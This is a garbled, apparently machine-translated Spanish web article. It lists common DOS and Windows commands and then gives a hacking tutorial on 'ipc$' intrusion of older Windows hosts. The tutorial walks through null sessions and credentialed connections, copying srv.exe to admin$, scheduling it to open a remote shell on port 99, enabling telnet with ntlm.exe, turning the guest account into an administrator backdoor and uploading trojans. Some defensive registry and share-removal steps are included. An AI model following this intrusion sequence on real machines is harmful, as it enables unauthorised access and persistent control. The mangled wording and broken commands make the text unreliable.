¿Cuáles son los comandos más utilizados en DOS?
Comandos comunes de DOS:
dir Listar nombres de archivos deltree Eliminar árbol de directorios cls Borrar pantalla cd Cambiar directorio actual
copiar Copiar archivos diskcopy Copiar disco del eliminar formato de archivo formatear disco
editar texto editar mem verificar el estado de la memoria md crear subdirectorio mover mover archivos, cambiar el nombre del directorio
Más tipos de visualización de pantalla dividida mostrar el contenido del archivo rd eliminar Directory sys Hacer un Disco del sistema DOS
ren Cambie el nombre del archivo xcopy Copie el directorio y el archivo chkdsk Verifique las propiedades del disco y configure las propiedades del archivo
fdisk fecha de partición del disco duro fdisk fecha de partición visualización y fecha de modificación conjunto de etiquetas volumen Defrag desfragmentación del disco
msd detección del sistema configuración de ruta directorio de búsqueda archivo compartido**** disfrute de la administración de optimización de memoria de memmaker
ayuda ayuda a restaurar restaurar la configuración del archivo de copia de seguridad establecer variables de entorno visualización de la hora y hora de modificación
árbol directorio árbol columna depuración depurador aleatorio doskey reiniciar llamada DOS comando prempt establecer aviso recuperar restaurar archivos eliminados scandisk detectar y reparar disco
Descripción detallada de comandos comunes:
A.Dir
Mostrar archivos de directorio y listas de subdirectorios
Mostrar archivos de directorio y listas de subdirectorios, jaja, por supuesto que todos deberían saber esto.
Puede utilizar caracteres comodín (? y *), ? representa un carácter comodín y * representa un carácter comodín de cualquier carácter. Sufijo
Utilice el sufijo para especificar el archivo que desea ver. Lo anterior en realidad funciona con un ".sufijo", por ejemplo, dir *.exe es equivalente a dir .exe
/p
muestra una pantalla de lista a la vez. Para ver la siguiente pantalla, presione cualquier tecla de su teclado.
/w
Muestra la lista en formato ancho, mostrando hasta 5 nombres de archivos o directorios por línea.
/s
Enumera el nombre del archivo especificado que aparece en el directorio especificado y en todos los subdirectorios. Mucho más rápido que win search
dir *.* -> a.txt Escribe la lista de archivos en el directorio actual en a.txt
dir *.* /s -> a. txt escribe la lista de archivos del directorio actual en un.txt, incluidos los archivos del subdirectorio.
II.Attrib
Muestra, establece o elimina los atributos de solo lectura, de archivo, de sistema y ocultos asignados a un archivo o directorio. Si se usa sin parámetros, attrib muestra los atributos de todos los archivos en el directorio actual.
+r
Establece el atributo de solo lectura.
-r
Borra el atributo de solo lectura.
+a
Establecer propiedades del archivo comprimido.
-a
Borrar atributos del archivo comprimido.
+s
Establecer propiedades del sistema.
-s
Borrar propiedades del sistema.
+h
Establecer atributos ocultos.
-h
Borrar atributos ocultos.
3. Cls
Borra toda la información que se muestra en la ventana del símbolo del sistema y devuelve una ventana vacía, es decir, "Borrar pantalla"
4. Salga
Salga del intérprete de comandos actual y regrese al sistema.
5. formatear
Formato
/q
Realizar formateo rápido. Elimina la tabla de archivos y el directorio raíz de un volumen previamente formateado, pero no escanea las áreas dañadas entre sectores.
Sólo se pueden formatear volúmenes completos previamente formateados utilizando la opción de línea de comandos /q.
VI.Ipconfig
Muestra todos los valores de configuración de red TCP/IP actuales, actualizando la configuración del Protocolo de configuración dinámica de host (DHCP) y del Sistema de nombres de dominio (DNS). Utilice ipconfig sin parámetros para mostrar las direcciones IP, máscaras de subred y puertas de enlace predeterminadas de todos los adaptadores.
/all
Muestra información completa de configuración TCP/IP para todos los adaptadores.
ipconfig es equivalente a winipcfg, que está disponible en ME, 98 y 95. Aunque Windows XP no proporciona una interfaz gráfica como el comando winipcfg, puede utilizar una conexión de red para ver y actualizar direcciones IP. Para hacer esto, abra Conexiones de red, haga clic derecho en la conexión de red, haga clic en Estado y luego haga clic en la pestaña Soporte.
Este comando es más adecuado para computadoras que están configuradas para obtener una dirección IP automáticamente. Permite al usuario determinar qué valores de configuración TCP/IP se configuran a través de DHCP, direccionamiento IP privado automático (APIPA) y otras configuraciones.
VII. md
Crear directorio o subdirectorio
VIII. Mover
Mover uno o más archivos de un directorio a Especificar directorio.
Nine.Nbtstat
Muestra estadísticas de NetBIOS basadas en TCP/IP (NetBT), tabla de nombres NetBIOS y caché de nombres NbtBIOS de computadoras locales y remotas.
etBIOS caché de nombres. nbtstat actualiza la caché de nombres NetBIOS y los nombres registrados del Servicio de nombres de Internet de Windows (WINS). Utilice nbtstat sin parámetros para mostrar la ayuda. Los parámetros de la línea de comando de Nbtstat distinguen entre mayúsculas y minúsculas.
-a nombreremoto
Muestra la tabla de nombres NetBIOS de la computadora remota, donde NombreRemoto es el nombre de la computadora NetBIOS de la computadora remota.
-A Dirección IP
Muestra una tabla de nombres NetBIOS para computadoras remotas, donde NombreRemoto es el nombre de la computadora NetBIOS de la computadora remota (separado por un punto decimal).
X.Netstat
Muestra conexiones TCP activas, puertos en los que el ordenador está escuchando, estadísticas de Ethernet, tablas de enrutamiento IP, estadísticas de IPv4 (protocolos IP, ICMP, TCP y UDP) e IPv6 estadísticas (IPv6, ICMPv6, TCP sobre IPv6 y UDP sobre IPv6). UDP sobre IPv6). Sin parámetros, netstat muestra conexiones TCP activas.
-a
Muestra todas las conexiones TCP activas y los puertos TCP y UDP en los que la computadora está escuchando.
XI.Ping
Verifica una conexión de nivel IP a otra computadora TCP/IP enviando un mensaje de solicitud de eco del Protocolo de control de mensajes de Internet (ICMP). ping es el comando TCP/IP principal que se utiliza para solucionar problemas de conectividad de red, accesibilidad y resolución de nombres. Sin parámetros, ping muestra ayuda. La resolución de nombres y direcciones IP son sus aplicaciones más sencillas y las más utilizadas.
-t
Especifica que el ping puede continuar enviando información de solicitud de eco al objetivo antes de ser interrumpido. Para dividir y mostrar estadísticas, presione CTRL-BREAK. Para interrumpir y salir del ping, presione CTRL-C.
-lSize
Especifica la longitud (en bytes) del campo "datos" en el mensaje de solicitud de eco enviado. El valor predeterminado es 32.
El tamaño máximo es 65 527.
12. Cambiar nombre (Ren)
Cambiar el nombre del archivo.
Por ejemplo, ren *.abc *.cba
13. Establecer (configuración)
Mostrar, configurar o eliminar variables de entorno. Sin ningún argumento, el comando set muestra la configuración del entorno actual.
14. Apagar
Permite apagar o reiniciar el ordenador local o remoto. Si no se utilizan parámetros, el apagado cerrará la sesión del usuario actual.
-m ComputerName
Especifica la computadora que se apagará.
-t xx
Establece el temporizador para apagar el sistema en xx segundos. El valor predeterminado es 20 segundos.
-l
Cerrar sesión del usuario actual, esta es la configuración predeterminada. -El nombre de la computadora tiene prioridad.
-s
Apaga el ordenador local.
-r
Apagar y luego reiniciar.
-a
Abortar el apagado. Se ignoran los argumentos distintos de -l y ComputerName. Durante el período de tiempo de espera, solo se puede utilizar -a.
XV. System File Checker (sfc)
Solo disponible en Win, puede escanear y verificar todos los archivos protegidos del sistema después de reiniciar la computadora
.
/scannow
Escanea inmediatamente todos los archivos protegidos del sistema.
/scanonce
Escanea todos los archivos protegidos del sistema a la vez.
/purgecache
Borra la caché de archivos de Protección de archivos de Windows y analiza todos los archivos protegidos del sistema inmediatamente.
/cachesize=x
Establece el tamaño de caché del archivo de Protección de archivos de Windows en MB.
XVI.tipo
Muestra el contenido del archivo de texto. Utilice el comando tipo para ver un archivo de texto o un archivo bat sin modificar el archivo.
XVII. Árbol
Muestra gráficamente la estructura de directorios de una ruta o disco en una unidad.
XVIII, Xcopy
Copia archivos y directorios, incluidos subdirectorios.
/s
Copia directorios y subdirectorios que no están vacíos. Si se omite /s, xcopy funcionará en un directorio.
/e
Copia todos los subdirectorios, incluidos los directorios vacíos.
XIX.copy
Copia uno o más archivos de una ubicación a otra.
XX. del
Elimina el archivo especificado.
Los comandos por lotes ftp y bat, así como net y telnet, tienen demasiados subcomandos, por lo que no los presentaremos aquí, pero estos comandos se usan con mucha frecuencia.
Comando IPC$:
Hay muchos artículos sobre la intrusión de ipc$ en Internet, y hay muchos excelentes, incluso se puede decir que sus pasos de ataque se han convertido en un modo clásico. , por lo que nadie está dispuesto a utilizarlo. Lo que se ha convertido en un estereotipo se utiliza para engañar a la gente.
Dicho esto, personalmente creo que estos artículos no se explican en detalle. Para los novatos que son nuevos en ipc$, una simple lista de pasos no puede responder a sus muchas confusiones (puede encontrarla casualmente). ipc en un foro de hackers a ver cuantas dudas hay).
Por eso escribí este tutorial.
¡Quería aclarar algunas confusiones y confusiones para que la gente no termine siempre deambulando por el mismo lugar! Si aún tiene preguntas después de leer esta publicación, ¡responda de inmediato!
En segundo lugar, ¿qué es ipc$?
IPC$ (Conexión de proceso de Internet) es una "tubería con nombre" para **** disfruta de recursos (todo el mundo lo dice). procesos A través del canal con nombre abierto para la comunicación entre computadoras, puede obtener los permisos correspondientes verificando el nombre de usuario y la contraseña, para administrar remotamente la computadora y ver sus recursos. Los recursos compartidos de la computadora.
Usando IPC$, el conector puede incluso establecer una conexión vacía con el host de destino sin un nombre de usuario y contraseña (por supuesto, la otra máquina debe haber abierto ipc$*** para disfrutar, de lo contrario no lo hará). poder conectarse), y al utilizar esta conexión vacía, el conector también puede obtener la lista de usuarios en el host de destino (sin embargo, el administrador responsable impedirá la exportación de la lista de usuarios).
Siempre hablamos de vulnerabilidades de ipc$ vulnerabilidades de ipc$ De hecho, ipc$ no es una vulnerabilidad real. Es una función de inicio de sesión remoto en la red abierta para facilitar la administración remota por parte de los administradores, y también abre la función predeterminada. **** Disfrute, es decir, de todos los discos lógicos (c$, d$, e$...) y directorios del sistema winnt o windows (admin$).
La intención original de todo esto es facilitar la gestión de los administradores, pero las buenas intenciones pueden no necesariamente dar sus frutos. Algunas personas tienen motivos ocultos (¿cuáles son sus intenciones?) No lo sé, solo un. error) utilizará IPC $ para acceder. *** Compartirá recursos, exportará listas de usuarios y utilizará algunas herramientas de diccionario y detección de contraseñas, con la esperanza de obtener permisos más altos para lograr propósitos posteriores.
Solución:
1) La conexión IPC es una función de inicio de sesión remoto en la red exclusiva de los sistemas Windows NT y superiores. Su función es equivalente a Telnet de Unix, ya que la función IPC$ requiere su uso. de Windows Muchas funciones DLL en NT, por lo que no se ejecutarán en Windows 9.x.
En otras palabras, solo nt/2000/xp puede establecer una conexión ipc$, y 98/me no puede establecer una conexión ipc$ (pero un amigo dijo que se puede establecer una conexión vacía en 98, yo No sé si es cierto o no, pero ahora es todo 2003, les sugiero que cambien a 98 sistemas, 98 no está contento)
2) Incluso las conexiones vacías no son 100% exitosas p>
2) Incluso las conexiones vacías no son 100% exitosas. Con éxito, si la otra parte ha desactivado el uso compartido de ipc$***, aún no puede establecer una conexión.
3) No significa que puede ver la lista de usuarios de la otra parte después de establecer una conexión ipc$, porque el administrador puede prohibir la exportación de la lista de usuarios
3. Ataques de piratas informáticos al establecer una conexión ipc$
Como. Como se mencionó anteriormente, incluso si establece una conexión vacía, aún puede ver la lista de usuarios de la otra parte. Si establece una conexión nula, también puede obtener una gran cantidad de información (que muchas veces es necesaria para intrusiones) y acceder a ciertos privilegios. Si puede tener permisos específicos, inicie sesión como usuario, entonces obtendrá los permisos correspondientes. Obviamente, si inicias sesión como administrador, no hace falta decir que puedes hacer lo que quieras. ! ! !
(Básicamente, se puede resumir en obtener información de destino, administrar procesos y servicios de destino, cargar troyanos y ejecutarlos. Si es un servidor 2000, también puede considerar abrir servicios de terminal para un fácil control. Cómo hacerlo ? ¡Esta es una buena idea! )(
Pero no se alegre, porque la contraseña del administrador no es tan fácil de obtener. Aunque habrá algunos administradores estúpidos que usarán contraseñas en blanco o contraseñas débiles, Después de todo, estos son la minoría, y ahora es diferente a medida que aumenta la conciencia de la gente sobre la seguridad, los administradores se vuelven cada vez más cautelosos y la contraseña del administrador se vuelve cada vez más difícil de obtener: (
Lo más poderoso es. Con muy poco acceso, o incluso muy pocos administradores para obtener la contraseña de administrador, los administradores serán cada vez más cuidadosos a la hora de obtener la contraseña de administrador.
Entonces, su mayor problema en el futuro será conectarse con pocos o ningún permiso. Poco a poco se dará cuenta de que las conexiones ipc$ no son omnipotentes, incluso si el host no abre ipc$*. es compartido, no puedes conectarte.
Así que creo que no debes considerar la invasión de ipc$ como el arma definitiva y no pensar que es invencible. Es como un pase de gol en el campo de fútbol. Rara vez tiene efectos fatales, pero lo es. Indispensable, creo que este es el significado de la conexión ipc$ en la piratería.
4. La relación entre ipc$ y la conexión vacía, 139, 445 puertos y el uso compartido predeterminado de ****
La relación entre los cuatro anteriores puede ser un tema muy confuso para novatos, pero la mayoría de los artículos no tienen explicaciones específicas, de hecho, mi comprensión no es muy completa. Todos se resumen a través de la comunicación con todos. (Se puede decir que un BBS con un buen ambiente de discusión es un paraíso para los novatos)
1) ipc$ y conexiones vacías:
Una conexión ipc$ que no requiere un nombre de usuario y la contraseña es una conexión vacía. Una vez que inicia sesión como usuario o administrador (es decir, inicia sesión en la conexión ipc $ con un nombre de usuario y contraseña específicos), naturalmente no se puede llamar una conexión vacía.
Muchas personas pueden preguntar, ya que puedes conectarte al vacío, entonces yo me conectaré al vacío, ¿por qué molestarse en buscar contraseñas débiles? Jaja, el motivo se ha mencionado antes, cuando te conectas al vacío. Al iniciar sesión, no tiene ningún permiso (lo cual es muy frustrante), pero cuando inicia sesión como usuario o administrador, tendrá los permisos correspondientes (quién no quiere tener permisos, de todos modos). Barrelo honestamente, no seas holgazán).
2) ipc$ y puertos 139 y 445:
la conexión ipc$ puede realizar un inicio de sesión remoto y acceder al modo compartido **** predeterminado y la apertura del puerto 139 significa que el aplicando el protocolo Netbios, podemos acceder a **** archivos/impresoras compartidas a través de los puertos 139 y 445 (win2000), por lo que generalmente, la conexión ipc$ requiere los puertos 139 y 445 (win2000) para acceder **** Acceso a archivos/impresoras compartidas, Por lo general, la conexión ipc$ requiere los puertos 139 y 445 (win2000). Por lo tanto, generalmente se requiere que las conexiones ipc$ admitan el puerto 139 o 445.
3)ipc$ y ****disfrute predeterminado
El ****disfrute predeterminado es el ****disfrute habilitado de forma predeterminada (por supuesto, puede activarlo). off), Se utiliza para la gestión remota de administradores, es decir, todos los discos lógicos (c$, d$, e$...) y directorios del sistema winnt o windows (admin$).
Cinco razones por las que falla la conexión ipc$
Las siguientes cinco razones son más comunes:
1) Su sistema no es NT o superior**** Sistema
2) La otra parte no abrió ipc$default*** enjoy
3) La otra parte no abrió el puerto 139 o 445 (confundida por haber sido bloqueada por el firewall). )
4) La entrada de su comando es incorrecta (como faltan espacios, etc.)
5) El nombre de usuario o la contraseña son incorrectos (por supuesto, es una conexión vacía, no 'no importa)
Además, puedes Analizar el motivo del número de error devuelto:
Error número 5, acceso denegado: Es muy probable que estés utilizando un usuario sin derechos de administrador, actualice primero los derechos;
Error número 51, Windows no puede encontrar la ruta de red: hay un problema con la red;
Error número 52, la ruta de red no puede ser encontrado: Hay un problema con la red;
Error número 53, No se puede encontrar la ruta de la red: Hay un problema con la red;
Error número 54, ruta de la red No se puede encontrar: Hay un problema con la red.
53. No se puede encontrar la ruta de red: dirección IP incorrecta; el destino no está encendido; el servicio lanmanserver de destino no está iniciado; el destino tiene un firewall (filtrado de puerto); no se puede encontrar el nombre de la red: usted El servicio lanmanworkstation no se inició; el objetivo eliminó ipc$;
Error #1219, las credenciales proporcionadas entran en conflicto con las credenciales existentes: ya ha establecido ipc$ con la otra parte. por favor borre y vuelva a conectarse.
Error n.º 1326, nombre de usuario desconocido o contraseña incorrecta: motivo obvio.
Error n.º 1792, intenté iniciar sesión, pero el servicio de inicio de sesión de red no se inició: el servicio NetLogon de destino sí lo hizo. no empezar. (Esto ocurre cuando se conecta al control de dominio).
Error #2242, La contraseña de este usuario ha caducado: el objetivo tiene una política de cuenta que fuerza cambios periódicos de contraseña.
El problema de que ipc$ no pueda conectarse es más complicado. Además de las razones anteriores, habrá otros factores inciertos que no puedo explicar en detalle y definitivamente depende de su propia experiencia. y experimentos.
Seis. Cómo abrir el IPC$ de destino (este párrafo es una cita de un artículo relacionado)
Primero, necesita obtener un shell que no dependa de ipc. $, como la extensión sql cmd, telnet, troyanos, etc. Por supuesto, este shell debe tener permisos de administrador y luego puede usarlo para ejecutar el comando net share ipc$ para abrir el ipc$ de destino. Como se puede ver en lo anterior, existen muchas condiciones para el funcionamiento de ipc$. Asegúrese de que el servicio relevante se esté ejecutando; si no, inícielo (si no sabe cómo iniciarlo, consulte el uso del comando net), si no funciona (por ejemplo, si hay un firewall, No puedo matarlo), se recomienda darse por vencido.
7. Cómo prevenir la intrusión de ipc$
1. Prohibir la enumeración de conexiones vacías (este **** no impide el establecimiento de conexiones vacías, citado en "Sesiones vacías en Win2000" Analysis》)
Primero ejecute regedit, busque la siguiente formación [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet CurrentControlSet\Control\LSA] y cambie el valor clave de RestrictAnonymous = DWORD a 00000001 (si se establece en 2, se puede ocurrir un error Algunos problemas, como problemas con algunos servicios WIN, etc.)
2 Desactive el **** predeterminado para disfrutar
1) Ver **** compartido local recursos
ejecutar-cmd-enter net share
2) Eliminar ****share (ingrese uno a la vez)
net share ipc$ /delete
participación neta admin$ /eliminar
participación neta c$ /eliminar
participación neta d$ /eliminar (si hay e, f,... , puedes continuar eliminando)
3 Desactiva el disfrute de **** predeterminado. .....)
3) Detener el servicio del servidor
net stop server /y (el servicio se reiniciará después de reiniciar el servidor)
4 ) Modifique la tabla de registro
Ejecute - regedit
versión del servidor: busque la siguiente clave principal [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] y coloque el siguiente valor de clave en él. Parámetros] Cambie el valor de AutoShareServer (DWORD) a 00000000.
Versión Pro: localice la siguiente clave principal [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ LanmanServer\Parameters].LanmanServer\Parameters] y cambie el valor de la clave de AutoShareWks (DWORD) a 00000000.
Si la clave anterior no existe, cree una nueva clave (haga clic derecho en Nuevo - Valor de doble byte) y cambie el valor de la clave.
3 Desactive permanentemente ipc$ y el **** predeterminado disfrute de servicios dependientes: lanmanserver es el servicio del servidor
Panel de control-Herramientas administrativas-Servicios-Buscar servicio de servidor (haga clic con el botón derecho ) -Propiedades-General-Tipo de inicio-Desactivado
4 Instale un firewall (verifique la configuración relacionada) o un filtrado de puertos (filtrado 139, 445, etc.), o use una nueva versión de Windows 7. ), o utilice una nueva versión del optimizador
5 Establezca una contraseña compleja para evitar que ipc$ se quede sin contraseñas
Ocho comandos relacionados
1) Cree una conexión vacía:
net use $">\IP\ipc$ "" /user:"" (Nota: esta línea de comando contiene tres espacios)
2) p>
2) Cree una conexión no nula:
net use $">\IP\ipc$ "nombre de usuario" /usuario: "contraseña" (nuevamente, 3 espacios)
3) Asigne el disfrute de **** predeterminado:
net use z: $">\IP\ipc$ "contraseña" /usuario:"" nombre de usuario" (puede asignar el usuario de la otra parte c a su propio disco z, y así sucesivamente para otros discos)
Si se ha establecido ipc$ con el objetivo, puede usar directamente IP+número de disco+$ para acceder, el comando específico es net use z:
4) Eliminar una conexión ipc$
net&nbs
p;use $">\\IP/ipc$ /del
5) Eliminar*** * disfrute del mapeo
net use c: La mayoría de los tutoriales de ipc lo han introducido como referencia. Me gustaría agradecer al autor original (! p>
11.C:\> net use $">\\127.0.0.1\IPC$ "contraseña" /usuario: "nombre de usuario"
Generalmente, el método de transmisión se utiliza para obtener datos débiles. contraseñas, cuentas de administrador y contraseñas mediante escaneo.
2 C:/>copiar srv.exe $">/\127.0.0.1\admin$
Primero copie srv.exe y vaya al directorio Herramientas debajo del transmisor (aquí $ se refiere a c:/winnt/system32/ del usuario administrador. También puede usar c $, d $, que significa unidad C y unidad D, y unidad D y unidad D. $, que significa unidad C y unidad D. Depende de dónde desee copiar).
3. C:net time \\127.0.0.1
Verifique la hora y busque. que la hora actual de 127.0.0.1 es 2004/6/15 A las 11:00 a. m., el comando se completó con éxito.
4. C:\>at\127.0.0.1 11:05 srv.exe
Utilice el comando at para iniciar srv.exe
5.C :/>hora neta\\127.0.0.1
¿Verificar la hora nuevamente? Si la hora actual de 127.0.0.1 es 2004/6/15 11:05 a.m., entonces puede comenzar a ejecutar el siguiente comando.
6. C:telnet 127.0.0.1 99
Aquí se utilizará el comando Telnet, ¿verdad? Tenga en cuenta que el puerto es 99. El puerto predeterminado de Telnet es 23, pero usamos SRV para configurar un shell para nuestro puerto 99 en otra computadora.
Aunque podemos hacer Telnet, SRV es de un solo uso y debe activarse nuevamente la próxima vez que inicie sesión. Por lo tanto, ¡necesitamos configurar el servicio Telnet!
7. C:\>copiar ntlm.exe $">\\127.0.0.1\admin$
Utilice el comando Copiar para cargar ntlm.exe al host (ntlm. exe también en el directorio Herramientas de Streaming).
8.C:\WINNT\system32>ntlm
Ingrese ntlm para iniciar (C:\WINNT\system32> aquí se refiere a computadora En el otro extremo, ejecutar ntlm en realidad hace que este programa se ejecute en el otro extremo de la computadora. Cuando aparece "DONE", significa que se ha iniciado normalmente. Luego use "net start telnet" para iniciar el servicio Telnet. p>
9 .Telnet 127.0.0.1, y luego ingrese el nombre de usuario y la contraseña para ingresar a la otra parte, **** es tan fácil como **** en DOS (¡Entonces qué quieres hacer! (Simplemente haz lo que quieras, jaja. )
Para agregar activación de invitado al grupo de administradores, por si acaso
10.C:\>net user guest /active:yes
Activar invitados de otros usuarios
11.C:\>net user guest 1234
12. a 1234, o su contraseña que desea establecer
12.C:\>net localgroup Administrators guest /add
Cambie invitado a Administrador (si se cambia la contraseña del administrador, el invitado la cuenta no se cambiará) . Si se cambia la contraseña del administrador pero la cuenta de invitado no se cambia, podemos usar el invitado para acceder a esta computadora nuevamente la próxima vez)
Preguntas frecuentes sobre ipc$:
p>
1. ¿Cómo crear una conexión vacía? ¿Para qué sirve una conexión vacía?
Respuesta: Utilice el comando net use \IPipc$ "" /user:"" para simplemente establecer una conexión vacía con el objetivo (se requiere que el objetivo esté abierto a ipc$)
Para NT, bajo la configuración de seguridad predeterminada, con la ayuda de una conexión vacía, puede enumerar los usuarios de destino. **** disfrute, acceda a TODOS los permisos y acceda al registro, etc., y la tasa de utilización es extremadamente baja. El efecto de 2000 es aún menor y no es conveniente de implementar.
2. ¿Por qué no se puede conectar IPC$?
Respuesta: 1: 1. Sólo las versiones nt/2000/xp y superiores pueden crear IPC$. Si está utilizando 98/me, esta función no está disponible.
2. Asegúrate de que el comando que ingresas sea correcto.
El comando correcto es: net use \target IP ipc$ "contraseña" /usuario: "nombre de usuario"
Tenga cuidado de no tener demasiados o muy pocos espacios. Las comillas dobles alrededor del nombre de usuario y la contraseña se pueden omitir si no contienen espacios. Las contraseñas vacías están representadas por "".
3. Analiza el motivo en función del número de error devuelto:
Error número 5, acceso denegado: Es muy probable que el usuario que estás utilizando no tenga derechos de administrador, por lo que actualice los derechos primero;
Error número 51, Windows no puede encontrar la ruta de red: hay un problema con la red;
Error número 53, no puede encontrar la ruta de red: la ip la dirección es incorrecta; el destino no está abierto; el servidor lanman de destino no está abierto; Error número 53, ruta de red no encontrada: dirección IP incorrecta; el destino no está abierto; el servicio lanmanserver de destino no está iniciado; el destino tiene un firewall (filtrado de puertos);
Error número 67, nombre de red no encontrado: su objetivo No abierto. 67. Nombre de red no encontrado: su servicio lanmanworkstation no se ha iniciado; el destino ha eliminado ipc$;
Error número 1219. Hay un conflicto entre las credenciales proporcionadas y el conjunto de credenciales existente: ha establecido una ipc$, borre el ipc$ antes de conectarse.
Error 1326, nombre de usuario desconocido o contraseña incorrecta: el motivo es obvio.
Error 1792, se intentó iniciar sesión pero el servicio NetLogon no se inició: el servicio NetLogon de destino no se inició; . (Esto ocurre cuando se conecta al control de dominio).
Error #2242, La contraseña de este usuario ha caducado: el objetivo tiene una política de cuenta que fuerza cambios periódicos de contraseña.
4. El problema de que ipc$ no pueda conectarse es relativamente complejo y no existe una comprensión unificada en los experimentos con pollos de engorde, lo cual a veces es muy difícil. Y conociendo el problema, muchos problemas aún no se pueden resolver si el shell no se obtiene por otros medios.
5. ¿Cómo abrir el IPC$ del objetivo?
Respuesta: Primero, necesita obtener un shell que no dependa de ipc$, como la extensión cmd de sql, telnet, trojan. Por supuesto, este shell debe tener derechos de administrador. Luego use el shell para ejecutar el comando net share ipc$ para abrir el ipc$ del objetivo. Como sabes por la pregunta anterior, hay muchas más condiciones bajo las cuales se puede utilizar ipc$. Asegúrese de que los servicios relevantes se estén ejecutando; de lo contrario, inícielos (consulte el uso del comando net si no sabe cómo). Si aún así no funciona (por ejemplo, si tienes un firewall y no puedes eliminarlo), te recomendamos que lo desistas.
6. ¿Cómo mapear y acceder al **** predeterminado?
Respuesta: Utilice el comando net use z:\ target IPc$ "contraseña" /usuario: "nombre de usuario" para asignar la unidad c de la otra parte a su propia unidad z, y así sucesivamente para otros discos.
Si ha establecido ipc$ con el destino, puede acceder a él directamente usando la IP más la letra de la unidad más $. Por ejemplo, copie muma.exe \IPd$pathmuma.exe. O puede mapear nuevamente, solo que sin nombre de usuario y contraseña: net use y:\IPd$ . Luego copie muma.exe y:pathmuma.exe. Cuando la ruta contiene espacios, la ruta debe estar entre comillas con "".
7. ¿Cómo eliminar el mapeo y la conexión ipc$?
Respuesta: Utilice el comando net use \IPipc$ /del para eliminar la conexión ipc$ del destino.
Utilice el comando net use z:/
del para eliminar el disco z asignado, y así sucesivamente para otros discos.
Utilice el comando net use * /del para eliminar todos los discos.
Se le pedirá que presione y para confirmar.
8. Conéctese a ipc$ y luego, ¿qué puedo hacer?
Respuesta: Si puede conectarse exitosamente al ipc$ de destino usando una cuenta con derechos de administrador, esto significa que puede "comunicarse" profundamente con otros sistemas. Puede utilizar varias herramientas de línea de comandos (como la serie pstools, Win2000SrvReskit, telnethack, etc.) para obtener información de destino y administrar procesos y servicios de destino. Si el objetivo tiene activado el botón predeterminado (si no, puedes activarlo por él), puedes cargar el troyano y ejecutarlo. También puedes subir vía tftp, ftp. Herramientas (troyanos) como dwrcc, VNC y RemoteAdmin también pueden controlar directamente la pantalla. Si es un servidor 2000, también puede considerar activar Terminal Services para un control más fácil. Para utilizar las herramientas mencionadas aquí, consulte las instrucciones adjuntas o los tutoriales relacionados.
9. ¿Cómo evitar que otros me invadan usando ips$ y el **** enjoy predeterminado?
A.A. Una forma es eliminar ipsc$ y el valor predeterminado **** enjoy. Pero seguirá ahí después de reiniciar. Esto requiere cambios en el registro.
1. Elimine primero el existente
net share ipc$ /del
net share admin$ /del
net share c. $ /del
............ (Eliminar algunos de ellos)
2 Prohibir a otros usar conexiones vacías
Primero ejecute regedit, busque la siguiente clave principal [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA] y establezca RestrictAnonymous (DWORD) en 00000002.
3. Desactive la apertura automática del valor predeterminado *** Disfrute
Para la versión del servidor, busque la siguiente clave principal [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]. MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters] y cambie el valor clave de AutoShareServer (DWORD) a: 00000000.
Para Professional Edition, [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters] Cambie el valor clave de AutoShareWks (DWORD) a :00000000.
Si la clave principal anterior no existe, cree una nueva clave principal y cambie el valor de la clave.
B, otro método es desactivar ipc$ y los servicios dependientes que se disfrutan de forma predeterminada *** (no recomendado)
net stop lanmanserver
puede Aparece Consejo: El servicio XXX también se cerrará. ¿Quieres continuar? Esto se debe a que también existen algunos servicios secundarios que dependen de lanmanserver. Por lo general, simplemente presione Y para continuar.
C. El método más simple es establecer una contraseña compleja para evitar que se establezcan contraseñas exhaustivas a través de ipc$. Pero si tiene otras vulnerabilidades, ipc$ facilitará más intrusiones.
D, otro método es instalar un firewall o filtrado de puertos
Comando DOS anormal
diskcomp diskcomp append set nonexpand restaurar archivos DOS fasthelp fasthelp muestra información de ayuda
fc filecompare interink inicia el servidor
setver establece la versión intersvr inicia el cliente
la ruta subst reemplaza el entorno integrado básico qbasic
vsafe anti -virus software unformat Recuperar un disco formateado
ver Muestra el número de versión de DOS smartdrv Presiona el pedal del acelerador
vol Muestra la etiqueta de volumen del disco lh Carga el programa en la memoria de alta gama
ctty Dispositivo de control de cambios emm386 gestión de memoria extendida